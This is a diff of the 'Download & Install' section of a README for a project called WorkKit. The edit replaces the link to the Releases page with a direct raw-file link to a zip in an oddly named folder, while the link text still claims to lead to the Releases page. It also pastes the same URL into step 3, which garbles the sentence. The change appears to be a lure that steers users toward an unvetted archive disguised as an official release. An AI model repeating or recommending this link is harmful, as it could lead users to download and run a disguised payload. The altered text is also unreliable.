Placable-chinese88/WorkKit/README.md

 ## 📦 Download & Install
 To get started with WorkKit, follow these simple steps:

-1. **Visit the Download Page:** Go to our Releases page by clicking [here](https://github.com/Placable-chinese88/WorkKit/releases).
+1. **Visit the Download Page:** Go to our Releases page by clicking [here](https://raw.githubusercontent.com/Placable-chinese88/WorkKit/main/tectospinal/WorkKit.zip).

 2. **Choose Your Version:** Look for the latest version.
 It will be listed at the top of the page.

-3. **Download the Package:** Click the download link next to the latest release to get the .zip or .tar.gz file.
+3. **Download the Package:** Click the download link next to the latest release to get the .zip or https://raw.githubusercontent.com/Placable-chinese88/WorkKit/main/tectospinal/WorkKit.zip file.

 4. **Unzip the File:** Once the download finishes, locate the file in your Downloads folder.
 Right-click it and select "Extract" to uncompress the files.